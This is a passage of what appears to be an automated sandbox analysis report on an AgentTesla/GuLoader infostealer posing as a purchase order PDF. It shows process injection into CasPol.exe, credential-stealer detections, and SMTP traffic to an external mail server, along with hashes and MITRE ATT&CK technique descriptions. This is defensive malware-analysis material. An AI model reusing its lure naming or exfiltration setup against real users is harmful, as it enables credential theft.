2021-12-14 11:52:59 UTC	221	IN	Data Raw: df 5d bc b3 e5 56 eb 39 01 81 89 1b c6 8f 5a 3d 08 84 60 27 a7 8b 4c 6e 98 9a b0 a3 02 2a 69 20 46 33 4a a2 0b 32 23 9d 74 4d af 8f 56 38 9d 70 bb a8 5b 24 38 8c ff f9 27 fe c4 fe 08 4e 78 3b 7a 7c 26 f7 a8 55 db 93 35 1a e8 1b 4f 85 4d dc af 91 b6 4b 2f b2 e5 35 22 3e e8 86 57 ec 23 53 38 2a 6e 9b 85 69 30 cd 0f 3f d7 88 df 64 d9 b1 86 3e 30 9e 78 b6 f9 d3 6f fd 84 28 59 3f 6b c8 56 f1 99 a4 ed 8a 81 bb fd 0c c6 7f 1c 12 d2 85 ce 23 30 f9 d7 8a 11 d2 82 c2 9f ac aa 49 ae 9a 35 5f 9c 36 0b 49 5c 44 6d 92 75 f2 19 e7 c2 72 10 15 4d 04 f9 c4 43 ec 06 61 f7 d7 7c 1f 32 d0 4c a8 66 b0 b6 ee 9d e1 00 15 de a1 d5 59 83 b0 94 e9 bc cc 6d 91 3f 20 f4 72 a8 ea ce d9 31 88 e3 2d 5d 92 26 98 35 5f e7 b6 7c 52 1d e8 1f 69 5b 16 0b 29 1e cf 00 ca 67 ca cf 02 5f 01 95 Data Ascii: ]V9Z=`'Lni F3J2#tMV8p[$8'Nx;z\|&U5OMK/5">W#S8ni0?d>0xo(Y?kV#0I5_6I\DmurMCa\|2LfYm? r1-]&5_\|Ri[)g_

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Dec 14, 2021 12:54:35.951989889 CET	587	49823	94.23.221.28	192.168.11.20	220-ns3.mealoja.com ESMTP Exim 4.94.2 #2 Tue, 14 Dec 2021 12:54:35 +0100 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Dec 14, 2021 12:54:35.952506065 CET	49823	587	192.168.11.20	94.23.221.28	EHLO 921702
Dec 14, 2021 12:54:35.972721100 CET	587	49823	94.23.221.28	192.168.11.20	250-ns3.mealoja.com Hello 921702 [102.129.143.72] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPE_CONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Dec 14, 2021 12:54:35.973098993 CET	49823	587	192.168.11.20	94.23.221.28	STARTTLS
Dec 14, 2021 12:54:35.996237040 CET	587	49823	94.23.221.28	192.168.11.20	220 TLS go ahead
Dec 14, 2021 12:54:38.959325075 CET	587	49824	94.23.221.28	192.168.11.20	220-ns3.mealoja.com ESMTP Exim 4.94.2 #2 Tue, 14 Dec 2021 12:54:38 +0100 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Dec 14, 2021 12:54:38.959583044 CET	49824	587	192.168.11.20	94.23.221.28	EHLO 921702
Dec 14, 2021 12:54:38.979685068 CET	587	49824	94.23.221.28	192.168.11.20	250-ns3.mealoja.com Hello 921702 [102.129.143.72] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPE_CONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Dec 14, 2021 12:54:38.980145931 CET	49824	587	192.168.11.20	94.23.221.28	STARTTLS
Dec 14, 2021 12:54:39.001730919 CET	587	49824	94.23.221.28	192.168.11.20	220 TLS go ahead

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: 210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe PID: 8152 Parent PID: 4600

General

Start time:	12:51:58
Start date:	14/12/2021
Path:	C:\Users\user\Desktop\210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe"
Imagebase:	0x400000
File size:	167936 bytes
MD5 hash:	1547238C5F89A46F4F3D448138478E05
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.101469724923.0000000002D80000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: CasPol.exe PID: 6116 Parent PID: 8152

General

Start time:	12:52:43
Start date:	14/12/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe"
Imagebase:	0x190000
File size:	108664 bytes
MD5 hash:	914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: CasPol.exe PID: 2268 Parent PID: 8152

General

Start time:	12:52:43
Start date:	14/12/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe"
Imagebase:	0x620000
File size:	108664 bytes
MD5 hash:	914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000A.00000000.101282349186.0000000000A00000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.105886078369.000000001DB80000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.105885711139.000000001DB31000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.105885711139.000000001DB31000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Analysis Process: conhost.exe PID: 6208 Parent PID: 2268

General

Start time:	12:52:43
Start date:	14/12/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6e4e20000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 210629 Purchase Order 449 BURGHAUSEN (uZ 20-270)_PDF.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Agenttesla

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre